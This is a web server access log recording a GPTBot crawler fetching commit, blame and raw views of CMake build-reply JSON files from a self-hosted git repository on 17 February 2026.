"/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13914] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13534] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13917] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12748] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12463] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12460] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12435] [Gzip 6.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13736] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10788] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12860] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10791] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13734] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13733] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13914] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9993] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12461] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12618] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 